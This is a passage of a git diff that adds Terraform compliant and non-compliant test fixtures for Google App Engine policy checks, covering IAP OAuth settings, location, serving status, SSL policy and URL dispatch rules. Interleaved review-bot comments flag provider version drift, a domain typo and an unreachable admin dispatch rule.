b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/c.tf new file mode 100644 index 000000000..70c2413cc --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "c" { + project = "my-project" + location_id = "us-central" + + iap { + oauth2_client_id = "12345.apps.googleusercontent.com" + oauth2_client_secret = "secret-value" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/config.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/nc.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/nc.tf new file mode 100644 index 000000000..c9ae2fa2c --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "nc" { + project = "my-project" + location_id = "us-central" + + iap { + oauth2_client_id = "incorrect-client-id.apps.googleusercontent.com" + oauth2_client_secret = "secret-value" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/plan.json b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/plan.json new file mode 100644 index 000000000..fa0a3a999 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/c.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/c.tf new file mode 100644 index 000000000..0f04c2318 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + iap { + oauth2_client_id = "12345.apps.googleusercontent.com" + oauth2_client_secret = "GOCSPX-abc123def456_actual_secret" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/config.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/nc.tf b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/nc.tf new file mode 100644 index 000000000..9932ccdc2 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + iap { + oauth2_client_id = "12345.apps.googleusercontent.com" + oauth2_client_secret = "12345" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/plan.json b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/plan.json new file mode 100644 index 000000000..710cf4d6b Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/location_id/.terraform.lock.hcl new file mode 100644 index 000000000..894abb857 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.12.0" + hashes = [ + "h1:vd1110nYSvbUdAM3MDtQD97ikZvuyDgKExlzTwutYqw=", + "zh:38722ec7777543c23e22e02695e53dd5c94644022647c3c79e11e587063d4d2b", + "zh:417b12b69c91c12e3fcefee38744b7a37bae73b706e3071c714151a623a6b0e9", + "zh:4902cea92c78b462beaf053de03d0d55fb2241d41ca3379b4568ba247f667fa9", + "zh:50ccce39d403ba477943e6652ccb6913092d9dcce1d55533b00b66062888db3d", + "zh:56dccfe5df28cfe368d93c37ad6c46a16e76da61482fd0bfc83676b1423cecf5", + "zh:7265fca2921e5e300da5d8de7e28b658c0863fdda9da696c5b97dbd3122c17c2", + "zh:8317467e828178a6db9ddabe431bb13935c00bfb5e4b4d9760bd56f7ae596eca", + "zh:84cc9d9277422a0d6c80d2bd204642d8776ddbba23feb94cf2760bb5f15410bc", + "zh:8f79d72e7ed4e36d01560ce5fc944dc7e0387fa0f8272a4345fc6ae896e8f575", + "zh:98c3d756beca036f84e7840e2099ff7359e9a246cd9a35386e03ce65032b3f5f", + "zh:a07e3ca19673d28da9289ca28dfb83204fa6636f642b8cf46de8caaf526b7dde", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/c.tf b/inputs/gcp/app_engine/app_engine_application/location_id/c.tf new file mode 100644 index 000000000..1717deddb --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/c.tf @@ -0,0 +1,4 @@ +resource "google_app_engine_application" "c" { + project = "gcp-test-project" + location_id = "australia-southeast1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/config.tf b/inputs/gcp/app_engine/app_engine_application/location_id/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/nc.tf b/inputs/gcp/app_engine/app_engine_application/location_id/nc.tf new file mode 100644 index 000000000..74d9d52b0 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/location_id/nc.tf @@ -0,0 +1,4 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-test-project" + location_id = "europe-west1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/location_id/plan.json b/inputs/gcp/app_engine/app_engine_application/location_id/plan.json new file mode 100644 index 000000000..b3b6c5110 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/location_id/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/project/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/project/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/project/c.tf b/inputs/gcp/app_engine/app_engine_application/project/c.tf new file mode 100644 index 000000000..41b337252 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/c.tf @@ -0,0 +1,4 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/project/config.tf b/inputs/gcp/app_engine/app_engine_application/project/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/project/nc.tf b/inputs/gcp/app_engine/app_engine_application/project/nc.tf new file mode 100644 index 000000000..011e00d52 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/nc.tf @@ -0,0 +1,6 @@ +# Describe your resource type here +# Keep "nc" as the name to indicate that this resource and its attributes are non-compliant +resource "google_app_engine_application" "nc" { + project = "invalid-project" + location_id = "australia-southeast1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/project/plan.json b/inputs/gcp/app_engine/app_engine_application/project/plan.json new file mode 100644 index 000000000..e49b4fa2a Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/project/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/serving_status/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/c.tf b/inputs/gcp/app_engine/app_engine_application/serving_status/c.tf new file mode 100644 index 000000000..9f21880c5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/c.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + serving_status = "SERVING" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/config.tf b/inputs/gcp/app_engine/app_engine_application/serving_status/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/nc.tf b/inputs/gcp/app_engine/app_engine_application/serving_status/nc.tf new file mode 100644 index 000000000..73deb59e3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/nc.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + serving_status = "USER_DISABLED" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/plan.json b/inputs/gcp/app_engine/app_engine_application/serving_status/plan.json new file mode 100644 index 000000000..e010856e3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/serving_status/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/ssl_policy/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/c.tf b/inputs/gcp/app_engine/app_engine_application/ssl_policy/c.tf new file mode 100644 index 000000000..058ef5826 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "us-central" + + ssl_policy = "DEFAULT" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/config.tf b/inputs/gcp/app_engine/app_engine_application/ssl_policy/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/nc.tf b/inputs/gcp/app_engine/app_engine_application/ssl_policy/nc.tf new file mode 100644 index 000000000..ed3c4d607 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "us-central" + + ssl_policy = "SSL_POLICY_UNSPECIFIED" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/plan.json b/inputs/gcp/app_engine/app_engine_application/ssl_policy/plan.json new file mode 100644 index 000000000..647251b30 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/ssl_policy/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/c.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/c.tf new file mode 100644 index 000000000..5fce90e2f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "c" { + project = "gcp-project-12345" + dispatch_rules { + domain = "hardhat.pythonanywhere.com" + path = "/*" + service = "default" + } +} \ No newline at end of file 
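Review bot: the lock file under location_id pins hashicorp/google 7.12.0 while the project and serving_status lock files pin 7.15.0 and the ssl_policy lock file pins 7.16.0, so the fixtures in this change are not evaluated against a single provider schema; regenerate them with one version. Each lock file also carries only one `h1:` hash, which means `terraform init` was run on one platform only; run `terraform providers lock -platform=linux_amd64` (plus any other platform CI uses) so checksum verification does not fail when another OS resolves the provider.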
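Review bot: every config.tf in this change declares `required_providers` with `source = "hashicorp/google"` and no `version` constraint, so nothing in the configuration bounds which major version `terraform init -upgrade` may select; the only pin is the lock file, and this change commits it at three different versions. Add `version = "~> 7.15"` (or whichever release the policies were written against) beside `source`; since the files are identical copies marked `##### DO NOT EDIT ######`, the constraint belongs in whatever template generates them.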
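Review bot: location_id/c.tf and location_id/nc.tf use `project = "gcp-test-project"` while every other fixture in this change uses `gcp-project-12345`; pick one so the fixtures do not drift apart for reasons unrelated to the attribute under test. Separately, each plan.json arrives as `Binary files /dev/null and b/.../plan.json differ`, so the plan the policy is actually evaluated against cannot be read in review. `terraform show -json` output is plain text; check why git classifies these files as binary (a `.gitattributes` entry or stray NUL bytes) before merging, otherwise future fixture changes will be unreviewable.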
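Review bot: project/nc.tf sets `project = "invalid-project"`, which is a syntactically well-formed project ID, so the non-compliant fixture only fails because that particular string is not accepted. If the rule is meant to catch a project number being passed where a project ID is required, use an all-digit value in nc.tf so the test fails for the documented reason rather than for an arbitrary name. The two template lines (`# Describe your resource type here` and the `# Keep "nc" as the name ...` comment) were also left in; no other fixture in this change carries them.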
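Review bot: serving_status/nc.tf treats `serving_status = "USER_DISABLED"` as non-compliant. Setting an application to USER_DISABLED is the supported way to take an App Engine app offline, for example during incident response, so as written this check will fail a deliberate shutdown. If the intent is to detect drift from a running state rather than a security misconfiguration, say so where the policy is documented, or have the rule warn instead of fail.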
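Review bot: ssl_policy/nc.tf sets `ssl_policy = "SSL_POLICY_UNSPECIFIED"` explicitly, but the realistic non-compliant case is a resource that omits `ssl_policy` altogether, which the plan shows as an unset attribute rather than that string; add a second fixture with the attribute absent and confirm the policy flags both. These fixtures also use `location_id = "us-central"` while the location_id fixtures treat `australia-southeast1` as the compliant region, so ssl_policy/c.tf is compliant for the ssl_policy rule only.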
diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/config.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/nc.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/nc.tf new file mode 100644 index 000000000..a55fe6f2f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "nc" { + project = "gcp-project-12345" + dispatch_rules { + domain = "inavlid-domain.com" + path = "/*" + service = "default" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/plan.json b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/plan.json new file mode 100644 index 000000000..497921d49 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/c.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/c.tf new file mode 100644 index 000000000..ff364f338 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/c.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_application_url_dispatch_rules" "c" { + project = "gcp-project-12345" + dispatch_rules { + domain = "*" + path = "/*" + service = "default" + } + + dispatch_rules { + domain = "*" + path = "/admin/*" + service = "admin" + } +} \ No newline at end of file 
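Review bot: in dispatch_rules_domain/nc.tf the domain `inavlid-domain.com` is a misspelling of `invalid-domain.com`. Since c.tf (`hardhat.pythonanywhere.com`) and nc.tf differ only in this string, the expected outcome depends entirely on which domains the policy allowlists, and that list is not visible anywhere in the change; document it so a reviewer can tell why one value passes and the other fails, and so the result does not hinge on a typo.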
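Review bot: dispatch_rules_path/c.tf lists the catch-all rule (`domain = "*"`, `path = "/*"`, `service = "default"`) before the `/admin/*` rule. App Engine dispatch rules are order dependent and only the first rule that matches a URL is applied, so with this ordering every request, including `/admin/*`, is dispatched to `default` and the `admin` rule is dead. Put the specific `/admin/*` rule first and the catch-all last, and consider having the policy check rule order, because a "compliant" file that silently misroutes admin traffic is worse than one that is obviously broken.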
diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/config.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/nc.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/nc.tf new file mode 100644 index 000000000..9a4b66169 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "nc" { + project = "gcp-project-12345" + dispatch_rules { + domain = "*" + path = "admin/*" + service = "admin" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/plan.json b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/plan.json new file mode 100644 index 000000000..98980258e Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null 
